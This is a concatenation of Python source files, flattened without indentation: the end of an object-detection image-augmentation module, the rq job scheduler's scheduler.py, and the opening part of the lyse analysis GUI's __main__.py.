S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
if perspective:
xy = (xy[:, :2] / xy[:, 2:3]).reshape(n, 8) # rescale
else: # affine
xy = xy[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# clip boxes
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=xy.T)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + 1e-16), h2 / (w2 + 1e-16)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + 1e-16) > area_thr) & (ar < ar_thr) # candidates
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
|
scheduler.py | import logging
import os
import signal
import time
import traceback
from datetime import datetime
from enum import Enum
from multiprocessing import Process
from redis import SSLConnection, UnixDomainSocketConnection
from .defaults import DEFAULT_LOGGING_DATE_FORMAT, DEFAULT_LOGGING_FORMAT
from .job import Job
from .logutils import setup_loghandlers
from .queue import Queue
from .registry import ScheduledJobRegistry
from .serializers import resolve_serializer
from .utils import current_timestamp
SCHEDULER_KEY_TEMPLATE = 'rq:scheduler:%s'
SCHEDULER_LOCKING_KEY_TEMPLATE = 'rq:scheduler-lock:%s'
class SchedulerStatus(str, Enum):
STARTED = 'started'
WORKING = 'working'
STOPPED = 'stopped'
class RQScheduler:
# STARTED: scheduler has been started but sleeping
# WORKING: scheduler is in the midst of scheduling jobs
# STOPPED: scheduler is in stopped condition
Status = SchedulerStatus
def __init__(self, queues, connection, interval=1, logging_level=logging.INFO,
date_format=DEFAULT_LOGGING_DATE_FORMAT,
log_format=DEFAULT_LOGGING_FORMAT, serializer=None):
self._queue_names = set(parse_names(queues))
self._acquired_locks = set()
self._scheduled_job_registries = []
self.lock_acquisition_time = None
# Copy the connection kwargs before mutating them in order to not change the arguments
# used by the current connection pool to create new connections
self._connection_kwargs = connection.connection_pool.connection_kwargs.copy()
# Redis does not accept parser_class argument which is sometimes present
# on connection_pool kwargs, for example when hiredis is used
self._connection_kwargs.pop('parser_class', None)
self._connection_class = connection.__class__ # client
connection_class = connection.connection_pool.connection_class
if issubclass(connection_class, SSLConnection):
self._connection_kwargs['ssl'] = True
if issubclass(connection_class, UnixDomainSocketConnection):
# The connection keyword arguments are obtained from
# `UnixDomainSocketConnection`, which expects `path`, but passed to
# `redis.client.Redis`, which expects `unix_socket_path`, renaming
# the key is necessary.
# `path` is not left in the dictionary as that keyword argument is
# not expected by `redis.client.Redis` and would raise an exception.
self._connection_kwargs['unix_socket_path'] = self._connection_kwargs.pop(
'path'
)
self.serializer = resolve_serializer(serializer)
self._connection = None
self.interval = interval
self._stop_requested = False
self._status = self.Status.STOPPED
self._process = None
self.log = logging.getLogger(__name__)
setup_loghandlers(
level=logging_level,
name=__name__,
log_format=log_format,
date_format=date_format,
)
@property
def connection(self):
if self._connection:
return self._connection
self._connection = self._connection_class(**self._connection_kwargs)
return self._connection
@property
def acquired_locks(self):
return self._acquired_locks
@property
def status(self):
return self._status
@property
def should_reacquire_locks(self):
"""Returns True if lock_acquisition_time is longer than 10 minutes ago"""
if self._queue_names == self.acquired_locks:
return False
if not self.lock_acquisition_time:
return True
return (datetime.now() - self.lock_acquisition_time).total_seconds() > 600
def acquire_locks(self, auto_start=False):
"""Returns names of queue it successfully acquires lock on"""
successful_locks = set()
pid = os.getpid()
self.log.info("Trying to acquire locks for %s", ", ".join(self._queue_names))
for name in self._queue_names:
if self.connection.set(self.get_locking_key(name), pid, nx=True, ex=60):
successful_locks.add(name)
# Always reset _scheduled_job_registries when acquiring locks
self._scheduled_job_registries = []
self._acquired_locks = self._acquired_locks.union(successful_locks)
self.lock_acquisition_time = datetime.now()
# If auto_start is requested and scheduler is not started,
# run self.start()
if self._acquired_locks and auto_start:
if not self._process:
self.start()
return successful_locks
def prepare_registries(self, queue_names=None):
"""Prepare scheduled job registries for use"""
self._scheduled_job_registries = []
if not queue_names:
queue_names = self._acquired_locks
for name in queue_names:
self._scheduled_job_registries.append(
ScheduledJobRegistry(name, connection=self.connection)
)
@classmethod
def get_locking_key(cls, name):
"""Returns scheduler key for a given queue name"""
return SCHEDULER_LOCKING_KEY_TEMPLATE % name
def enqueue_scheduled_jobs(self):
"""Enqueue jobs whose timestamp is in the past"""
self._status = self.Status.WORKING
if not self._scheduled_job_registries and self._acquired_locks:
self.prepare_registries()
for registry in self._scheduled_job_registries:
timestamp = current_timestamp()
# TODO: try to use Lua script to make get_jobs_to_schedule()
# and remove_jobs() atomic
job_ids = registry.get_jobs_to_schedule(timestamp)
if not job_ids:
continue
queue = Queue(registry.name, connection=self.connection, serializer=self.serializer)
with self.connection.pipeline() as pipeline:
jobs = Job.fetch_many(
job_ids, connection=self.connection, serializer=self.serializer
)
for job in jobs:
if job is not None:
queue.enqueue_job(job, pipeline=pipeline)
registry.remove(job, pipeline=pipeline)
pipeline.execute()
self._status = self.Status.STARTED
def _install_signal_handlers(self):
"""Installs signal handlers for handling SIGINT and SIGTERM
gracefully.
"""
signal.signal(signal.SIGINT, self.request_stop)
signal.signal(signal.SIGTERM, self.request_stop)
def request_stop(self, signum=None, frame=None):
"""Toggle self._stop_requested that's checked on every loop"""
self._stop_requested = True
def heartbeat(self):
"""Updates the TTL on scheduler keys and the locks"""
self.log.debug("Scheduler sending heartbeat to %s",
", ".join(self.acquired_locks))
if len(self._queue_names) > 1:
with self.connection.pipeline() as pipeline:
for name in self._queue_names:
key = self.get_locking_key(name)
pipeline.expire(key, self.interval + 5)
pipeline.execute()
else:
key = self.get_locking_key(next(iter(self._queue_names)))
self.connection.expire(key, self.interval + 5)
def stop(self):
self.log.info("Scheduler stopping, releasing locks for %s...",
','.join(self._queue_names))
self.release_locks()
self._status = self.Status.STOPPED
def release_locks(self):
"""Release acquired locks"""
keys = [self.get_locking_key(name) for name in self._queue_names]
self.connection.delete(*keys)
self._acquired_locks = set()
def start(self):
self._status = self.Status.STARTED
# Redis instance can't be pickled across processes so we need to
# clean this up before forking
self._connection = None
self._process = Process(target=run, args=(self,), name='Scheduler')
self._process.start()
return self._process
def work(self):
self._install_signal_handlers()
while True:
if self._stop_requested:
self.stop()
break
if self.should_reacquire_locks:
self.acquire_locks()
self.enqueue_scheduled_jobs()
self.heartbeat()
time.sleep(self.interval)
def run(scheduler):
scheduler.log.info("Scheduler for %s started with PID %s",
','.join(scheduler._queue_names), os.getpid())
try:
scheduler.work()
except: # noqa
scheduler.log.error(
'Scheduler [PID %s] raised an exception.\n%s',
os.getpid(), traceback.format_exc()
)
raise
scheduler.log.info("Scheduler with PID %s has stopped", os.getpid())
def parse_names(queues_or_names):
"""Given a list of strings or queues, returns queue names"""
names = []
for queue_or_name in queues_or_names:
if isinstance(queue_or_name, Queue):
names.append(queue_or_name.name)
else:
names.append(str(queue_or_name))
return names
|
__main__.py | from __future__ import division, unicode_literals, print_function, absolute_import # Ease the transition to Python 3
import os
import labscript_utils.excepthook
try:
from labscript_utils import check_version
except ImportError:
raise ImportError('Require labscript_utils > 2.1.0')
check_version('labscript_utils', '2.10.0', '3')
# Splash screen
from labscript_utils.splash import Splash
splash = Splash(os.path.join(os.path.dirname(__file__), 'lyse.svg'))
splash.show()
splash.update_text('importing standard library modules')
# stdlib imports
import sys
import socket
import logging
import threading
import signal
import subprocess
import time
import traceback
import pprint
import ast
# 3rd party imports:
splash.update_text('importing numpy')
import numpy as np
splash.update_text('importing h5_lock and h5py')
import labscript_utils.h5_lock
import h5py
splash.update_text('importing pandas')
import pandas
splash.update_text('importing Qt')
check_version('qtutils', '2.2.2', '3.0.0')
splash.update_text('importing labscript suite modules')
check_version('labscript_utils', '2.12.4', '3')
from labscript_utils.ls_zprocess import ZMQServer, ProcessTree
import zprocess
from labscript_utils.labconfig import LabConfig, config_prefix
from labscript_utils.setup_logging import setup_logging
from labscript_utils.qtwidgets.headerview_with_widgets import HorizontalHeaderViewWithWidgets
from labscript_utils.qtwidgets.outputbox import OutputBox
import labscript_utils.shared_drive as shared_drive
from lyse.dataframe_utilities import (concat_with_padding,
get_dataframe_from_shot,
replace_with_padding)
from qtutils.qt import QtCore, QtGui, QtWidgets
from qtutils.qt.QtCore import pyqtSignal as Signal
from qtutils import inmain_decorator, inmain, UiLoader, DisconnectContextManager
from qtutils.auto_scroll_to_end import set_auto_scroll_to_end
import qtutils.icons
from labscript_utils import PY2
if PY2:
str = unicode
import Queue as queue
else:
import queue
from lyse import LYSE_DIR
process_tree = ProcessTree.instance()
# Set a meaningful name for zlock client id:
process_tree.zlock_client.set_process_name('lyse')
def set_win_appusermodel(window_id):
from labscript_utils.winshell import set_appusermodel, appids, app_descriptions
icon_path = os.path.join(LYSE_DIR, 'lyse.ico')
executable = sys.executable.lower()
if not executable.endswith('w.exe'):
executable = executable.replace('.exe', 'w.exe')
relaunch_command = executable + ' ' + os.path.join(LYSE_DIR, '__main__.py')
relaunch_display_name = app_descriptions['lyse']
set_appusermodel(window_id, appids['lyse'], icon_path, relaunch_command, relaunch_display_name)
@inmain_decorator()
def error_dialog(message):
QtWidgets.QMessageBox.warning(app.ui, 'lyse', message)
@inmain_decorator()
def question_dialog(message):
reply = QtWidgets.QMessageBox.question(app.ui, 'lyse', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No)
return (reply == QtWidgets.QMessageBox.Yes)
def scientific_notation(x, sigfigs=4, mode='eng'):
"""Returns a unicode string of the float f in scientific notation"""
times = u'\u00d7'
thinspace = u'\u2009'
hairspace = u'\u200a'
sups = {u'-': u'\u207b',
u'0': u'\u2070',
u'1': u'\xb9',
u'2': u'\xb2',
u'3': u'\xb3',
u'4': u'\u2074',
u'5': u'\u2075',
u'6': u'\u2076',
u'7': u'\u2077',
u'8': u'\u2078',
u'9': u'\u2079'}
prefixes = {
-24: u"y",
-21: u"z",
-18: u"a",
-15: u"f",
-12: u"p",
-9: u"n",
-6: u"\u03bc",
-3: u"m",
0: u"",
3: u"k",
6: u"M",
9: u"G",
12: u"T",
15: u"P",
18: u"E",
21: u"Z",
24: u"Y"
}
if not isinstance(x, float):
raise TypeError('x must be floating point number')
if np.isnan(x) or np.isinf(x):
return str(x)
if x != 0:
exponent = int(np.floor(np.log10(np.abs(x))))
# Only multiples of 10^3
exponent = int(np.floor(exponent / 3) * 3)
else:
exponent = 0
significand = x / 10 ** exponent
pre_decimal, post_decimal = divmod(significand, 1)
digits = sigfigs - len(str(int(pre_decimal)))
significand = round(significand, digits)
result = str(significand)
if exponent:
if mode == 'exponential':
superscript = ''.join(sups.get(char, char) for char in str(exponent))
result += thinspace + times + thinspace + '10' + superscript
elif mode == 'eng':
try:
# If our number has an SI prefix then use it
prefix = prefixes[exponent]
result += hairspace + prefix
except KeyError:
# Otherwise display in scientific notation
superscript = ''.join(sups.get(char, char) for char in str(exponent))
result += thinspace + times + thinspace + '10' + superscript
return result
def get_screen_geometry():
"""Return the a list of the geometries of each screen: each a tuple of
left, top, width and height"""
geoms = []
desktop = qapplication.desktop()
for i in range(desktop.screenCount()):
sg = desktop.screenGeometry(i)
geoms.append((sg.left(), sg.top(), sg.width(), sg.height()))
return geoms
class WebServer(ZMQServer):
def handler(self, request_data):
logger.info('WebServer request: %s' % str(request_data))
if request_data == 'hello':
return 'hello'
elif request_data == 'get dataframe':
# convert_objects() picks fixed datatypes for columns that are
# compatible with fixed datatypes, dramatically speeding up
# pickling. But we don't impose fixed datatypes earlier than now
# because the user is free to use mixed datatypes in a column, and
# we won't want to prevent values of a different type being added
# in the future. All kwargs False because we don't want to coerce
# strings to numbers or anything - just choose the correct
# datatype for columns that are already a single datatype:
return app.filebox.shots_model.dataframe.convert_objects(
convert_dates=False, convert_numeric=False, convert_timedeltas=False)
elif isinstance(request_data, dict):
if 'filepath' in request_data:
h5_filepath = shared_drive.path_to_local(request_data['filepath'])
if isinstance(h5_filepath, bytes):
h5_filepath = h5_filepath.decode('utf8')
if not isinstance(h5_filepath, str):
raise AssertionError(str(type(h5_filepath)) + ' is not str or bytes')
app.filebox.incoming_queue.put(h5_filepath)
return 'added successfully'
elif isinstance(request_data, str):
# Just assume it's a filepath:
app.filebox.incoming_queue.put(shared_drive.path_to_local(request_data))
return "Experiment added successfully\n"
return ("error: operation not supported. Recognised requests are:\n "
"'get dataframe'\n 'hello'\n {'filepath': <some_h5_filepath>}")
class LyseMainWindow(QtWidgets.QMainWindow):
# A signal to show that the window is shown and painted.
firstPaint = Signal()
# A signal for when the window manager has created a new window for this widget:
newWindow = Signal(int)
def __init__(self, *args, **kwargs):
QtWidgets.QMainWindow.__init__(self, *args, **kwargs)
self._previously_painted = False
self.closing = False
def closeEvent(self, event):
if self.closing:
return QtWidgets.QMainWindow.closeEvent(self, event)
if app.on_close_event():
self.closing = True
timeout_time = time.time() + 2
self.delayedClose(timeout_time)
event.ignore()
def delayedClose(self, timeout_time):
if not all(app.workers_terminated().values()) and time.time() < timeout_time:
QtCore.QTimer.singleShot(50, lambda: self.delayedClose(timeout_time))
else:
QtCore.QTimer.singleShot(0, self.close)
def event(self, event):
result = QtWidgets.QMainWindow.event(self, event)
if event.type() == QtCore.QEvent.WinIdChange:
self.newWindow.emit(self.effectiveWinId())
return result
def paintEvent(self, event):
result = QtWidgets.QMainWindow.paintEvent(self, event)
if not self._previously_painted:
self._previously_painted = True
self.firstPaint.emit()
return result
class AnalysisRoutine(object):
def __init__(self, filepath, model, output_box_port, checked=QtCore.Qt.Checked):
self.filepath = filepath
self.shortname = os.path.basename(self.filepath)
self.model = model
self.output_box_port = output_box_port
self.COL_ACTIVE = RoutineBox.COL_ACTIVE
self.COL_STATUS = RoutineBox.COL_STATUS
self.COL_NAME = RoutineBox.COL_NAME
self.ROLE_FULLPATH = RoutineBox.ROLE_FULLPATH
self.error = False
self.done = False
self.to_worker, self.from_worker, self.worker = self.start_worker()
# Make a row to put into the model:
active_item = QtGui.QStandardItem()
active_item.setCheckable(True)
active_item.setCheckState(checked)
info_item = QtGui.QStandardItem()
name_item = QtGui.QStandardItem(self.shortname)
name_item.setToolTip(self.filepath)
name_item.setData(self.filepath, self.ROLE_FULLPATH)
self.model.appendRow([active_item, info_item, name_item])
self.exiting = False
def start_worker(self):
# Start a worker process for this analysis routine:
worker_path = os.path.join(LYSE_DIR, 'analysis_subprocess.py')
child_handles = process_tree.subprocess(
worker_path,
output_redirection_port=self.output_box_port,
startup_timeout=30,
)
to_worker, from_worker, worker = child_handles
# Tell the worker what script it with be executing:
to_worker.put(self.filepath)
return to_worker, from_worker, worker
def do_analysis(self, filepath):
self.to_worker.put(['analyse', filepath])
signal, data = self.from_worker.get()
if signal == 'error':
return False, data
elif signal == 'done':
return True, data
else:
raise ValueError('invalid signal %s'%str(signal))
@inmain_decorator()
def set_status(self, status):
index = self.get_row_index()
if index is None:
# Yelp, we've just been deleted. Nothing to do here.
return
status_item = self.model.item(index, self.COL_STATUS)
if status == 'done':
status_item.setIcon(QtGui.QIcon(':/qtutils/fugue/tick'))
self.done = True
self.error = False
elif status == 'working':
status_item.setIcon(QtGui.QIcon(':/qtutils/fugue/hourglass'))
self.done = False
self.error = False
elif status == 'error':
status_item.setIcon(QtGui.QIcon(':/qtutils/fugue/exclamation'))
self.error = True
self.done = False
elif status == 'clear':
status_item.setData(None, QtCore.Qt.DecorationRole)
self.done = False
self.error = False
else:
raise ValueError(status)
@inmain_decorator()
def enabled(self):
index = self.get_row_index()
if index is None:
# Yelp, we've just been deleted.
return False
enabled_item = self.model.item(index, self.COL_ACTIVE)
return (enabled_item.checkState() == QtCore.Qt.Checked)
def get_row_index(self):
"""Returns the row index for this routine's row in the model"""
for row in range(self.model.rowCount()):
name_item = self.model.item(row, self.COL_NAME)
fullpath = name_item.data(self.ROLE_FULLPATH)
if fullpath == self.filepath:
return row
def restart(self):
# TODO set status to 'restarting' or an icon or something, and gray out the item?
self.end_child(restart=True)
def remove(self):
"""End the child process and remove from the treeview"""
self.end_child()
index = self.get_row_index()
if index is None:
# Already gone
return
self.model.removeRow(index)
def end_child(self, restart=False):
self.to_worker.put(['quit', None])
timeout_time = time.time() + 2
self.exiting = True
QtCore.QTimer.singleShot(50,
lambda: self.check_child_exited(self.worker, timeout_time, kill=False, restart=restart))
def check_child_exited(self, worker, timeout_time, kill=False, restart=False):
worker.poll()
if worker.returncode is None and time.time() < timeout_time:
QtCore.QTimer.singleShot(50,
lambda: self.check_child_exited(worker, timeout_time, kill, restart))
return
elif worker.returncode is None:
if not kill:
worker.terminate()
app.output_box.output('%s worker not responding.\n'%self.shortname)
timeout_time = time.time() + 2
QtCore.QTimer.singleShot(50,
lambda: self.check_child_exited(worker, timeout_time, kill=True, restart=restart))
return
else:
worker.kill()
app.output_box.output('%s worker killed\n'%self.shortname, red=True)
elif kill:
app.output_box.output('%s worker terminated\n'%self.shortname, red=True)
else:
app.output_box.output('%s worker exited cleanly\n'%self.shortname)
# if analysis was running notify analysisloop that analysis has failed
self.from_worker.put(('error', {}))
if restart:
self.to_worker, self.from_worker, self.worker = self.start_worker()
app.output_box.output('%s worker restarted\n'%self.shortname)
self.exiting = False
class TreeView(QtWidgets.QTreeView):
leftClicked = Signal(QtCore.QModelIndex)
doubleLeftClicked = Signal(QtCore.QModelIndex)
"""A QTreeView that emits a custom signal leftClicked(index) after a left
click on a valid index, and doubleLeftClicked(index) (in addition) on
double click."""
def __init__(self, *args):
QtWidgets.QTreeView.__init__(self, *args)
self._pressed_index = None
self._double_click = False
def mousePressEvent(self, event):
result = QtWidgets.QTreeView.mousePressEvent(self, event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid():
self._pressed_index = self.indexAt(event.pos())
return result
def leaveEvent(self, event):
result = QtWidgets.QTreeView.leaveEvent(self, event)
self._pressed_index = None
self._double_click = False
return result
def mouseDoubleClickEvent(self, event):
# Ensure our left click event occurs regardless of whether it is the
# second click in a double click or not
result = QtWidgets.QTreeView.mouseDoubleClickEvent(self, event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid():
self._pressed_index = self.indexAt(event.pos())
self._double_click = True
return result
def mouseReleaseEvent(self, event):
result = QtWidgets.QTreeView.mouseReleaseEvent(self, event)
index = self.indexAt(event.pos())
if event.button() == QtCore.Qt.LeftButton and index.isValid() and index == self._pressed_index:
self.leftClicked.emit(index)
if self._double_click:
self.doubleLeftClicked.emit(index)
self._pressed_index = None
self._double_click = False
return result
class RoutineBox(object):
COL_ACTIVE = 0
COL_STATUS = 1
COL_NAME = 2
ROLE_FULLPATH = QtCore.Qt.UserRole + 1
# This data (stored in the name item) does not necessarily match
# the position in the model. It will be set just
# prior to sort() being called with this role as the sort data.
# This is how we will reorder the model's rows instead of
# using remove/insert.
ROLE_SORTINDEX = QtCore.Qt.UserRole + 2
def __init__(self, container, exp_config, filebox, from_filebox, to_filebox, output_box_port, multishot=False):
self.multishot = multishot
self.filebox = filebox
self.exp_config = exp_config
self.from_filebox = from_filebox
self.to_filebox = to_filebox
self.output_box_port = output_box_port
self.logger = logging.getLogger('lyse.RoutineBox.%s'%('multishot' if multishot else 'singleshot'))
loader = UiLoader()
loader.registerCustomWidget(TreeView)
self.ui = loader.load(os.path.join(LYSE_DIR, 'routinebox.ui'))
container.addWidget(self.ui)
if multishot:
self.ui.groupBox.setTitle('Multishot routines')
else:
self.ui.groupBox.setTitle('Singleshot routines')
self.model = UneditableModel()
self.header = HorizontalHeaderViewWithWidgets(self.model)
self.ui.treeView.setHeader(self.header)
self.ui.treeView.setModel(self.model)
active_item = QtGui.QStandardItem()
active_item.setToolTip('Whether the analysis routine should run')
status_item = QtGui.QStandardItem()
status_item.setIcon(QtGui.QIcon(':qtutils/fugue/information'))
status_item.setToolTip('The status of this analyis routine\'s execution')
name_item = QtGui.QStandardItem('name')
name_item.setToolTip('The name of the python script for the analysis routine')
self.select_all_checkbox = QtWidgets.QCheckBox()
self.select_all_checkbox.setToolTip('whether the analysis routine should run')
self.header.setWidget(self.COL_ACTIVE, self.select_all_checkbox)
self.header.setStretchLastSection(True)
self.select_all_checkbox.setTristate(False)
self.model.setHorizontalHeaderItem(self.COL_ACTIVE, active_item)
self.model.setHorizontalHeaderItem(self.COL_STATUS, status_item)
self.model.setHorizontalHeaderItem(self.COL_NAME, name_item)
self.model.setSortRole(self.ROLE_SORTINDEX)
self.ui.treeView.resizeColumnToContents(self.COL_ACTIVE)
self.ui.treeView.resizeColumnToContents(self.COL_STATUS)
self.ui.treeView.setColumnWidth(self.COL_NAME, 200)
self.ui.treeView.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
# Make the actions for the context menu:
self.action_set_selected_active = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box'), 'set selected routines active', self.ui)
self.action_set_selected_inactive = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box-uncheck'), 'set selected routines inactive', self.ui)
self.action_restart_selected = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/arrow-circle'), 'restart worker process for selected routines', self.ui)
self.action_remove_selected = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/minus'), 'Remove selected routines', self.ui)
self.last_opened_routine_folder = self.exp_config.get('paths', 'analysislib')
self.routines = []
self.connect_signals()
self.analysis = threading.Thread(target = self.analysis_loop)
self.analysis.daemon = True
self.analysis.start()
def connect_signals(self):
self.ui.toolButton_add_routines.clicked.connect(self.on_add_routines_clicked)
self.ui.toolButton_remove_routines.clicked.connect(self.on_remove_selection)
self.model.itemChanged.connect(self.on_model_item_changed)
self.ui.treeView.doubleLeftClicked.connect(self.on_treeview_double_left_clicked)
# A context manager with which we can temporarily disconnect the above connection.
self.model_item_changed_disconnected = DisconnectContextManager(
self.model.itemChanged, self.on_model_item_changed)
self.select_all_checkbox.stateChanged.connect(self.on_select_all_state_changed)
self.select_all_checkbox_state_changed_disconnected = DisconnectContextManager(
self.select_all_checkbox.stateChanged, self.on_select_all_state_changed)
self.ui.treeView.customContextMenuRequested.connect(self.on_treeView_context_menu_requested)
self.action_set_selected_active.triggered.connect(
lambda: self.on_set_selected_triggered(QtCore.Qt.Checked))
self.action_set_selected_inactive.triggered.connect(
lambda: self.on_set_selected_triggered(QtCore.Qt.Unchecked))
self.action_restart_selected.triggered.connect(self.on_restart_selected_triggered)
self.action_remove_selected.triggered.connect(self.on_remove_selection)
self.ui.toolButton_move_to_top.clicked.connect(self.on_move_to_top_clicked)
self.ui.toolButton_move_up.clicked.connect(self.on_move_up_clicked)
self.ui.toolButton_move_down.clicked.connect(self.on_move_down_clicked)
self.ui.toolButton_move_to_bottom.clicked.connect(self.on_move_to_bottom_clicked)
def on_add_routines_clicked(self):
routine_files = QtWidgets.QFileDialog.getOpenFileNames(self.ui,
'Select analysis routines',
self.last_opened_routine_folder,
"Python scripts (*.py)")
if type(routine_files) is tuple:
routine_files, _ = routine_files
if not routine_files:
# User cancelled selection
return
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
routine_files = [os.path.abspath(routine_file) for routine_file in routine_files]
# Save the containing folder for use next time we open the dialog box:
self.last_opened_routine_folder = os.path.dirname(routine_files[0])
self.add_routines([(routine_file, QtCore.Qt.Checked) for routine_file in routine_files])
def add_routines(self, routine_files, clear_existing=False):
"""Add routines to the routine box, where routine_files is a list of
tuples containing the filepath and whether the routine is enabled or
not when it is added. if clear_existing == True, then any existing
analysis routines will be cleared before the new ones are added."""
if clear_existing:
for routine in self.routines[:]:
routine.remove()
self.routines.remove(routine)
# Queue the files to be opened:
for filepath, checked in routine_files:
if filepath in [routine.filepath for routine in self.routines]:
app.output_box.output('Warning: Ignoring duplicate analysis routine %s\n'%filepath, red=True)
continue
routine = AnalysisRoutine(filepath, self.model, self.output_box_port, checked)
self.routines.append(routine)
self.update_select_all_checkstate()
def on_treeview_double_left_clicked(self, index):
# If double clicking on the the name item, open
# the routine in the specified text editor:
if index.column() != self.COL_NAME:
return
name_item = self.model.item(index.row(), self.COL_NAME)
routine_filepath = name_item.data(self.ROLE_FULLPATH)
# get path to text editor
editor_path = self.exp_config.get('programs', 'text_editor')
editor_args = self.exp_config.get('programs', 'text_editor_arguments')
# Get the current labscript file:
if not editor_path:
error_dialog("No editor specified in the labconfig.")
if '{file}' in editor_args:
# Split the args on spaces into a list, replacing {file} with the labscript file
editor_args = [arg if arg != '{file}' else routine_filepath for arg in editor_args.split()]
else:
# Otherwise if {file} isn't already in there, append it to the other args:
editor_args = [routine_filepath] + editor_args.split()
try:
subprocess.Popen([editor_path] + editor_args)
except Exception as e:
error_dialog("Unable to launch text editor specified in %s. Error was: %s" %
(self.exp_config.config_path, str(e)))
def on_remove_selection(self):
self.remove_selection()
def remove_selection(self, confirm=True):
selected_indexes = self.ui.treeView.selectedIndexes()
selected_rows = set(index.row() for index in selected_indexes)
if not selected_rows:
return
if confirm and not question_dialog("Remove %d routines?" % len(selected_rows)):
return
name_items = [self.model.item(row, self.COL_NAME) for row in selected_rows]
filepaths = [item.data(self.ROLE_FULLPATH) for item in name_items]
for routine in self.routines[:]:
if routine.filepath in filepaths:
routine.remove()
self.routines.remove(routine)
self.update_select_all_checkstate()
def on_model_item_changed(self, item):
if item.column() == self.COL_ACTIVE:
self.update_select_all_checkstate()
def on_select_all_state_changed(self, state):
with self.select_all_checkbox_state_changed_disconnected:
# Do not allow a switch *to* a partially checked state:
self.select_all_checkbox.setTristate(False)
state = self.select_all_checkbox.checkState()
with self.model_item_changed_disconnected:
for row in range(self.model.rowCount()):
active_item = self.model.item(row, self.COL_ACTIVE)
active_item.setCheckState(state)
def on_treeView_context_menu_requested(self, point):
menu = QtWidgets.QMenu(self.ui.treeView)
menu.addAction(self.action_set_selected_active)
menu.addAction(self.action_set_selected_inactive)
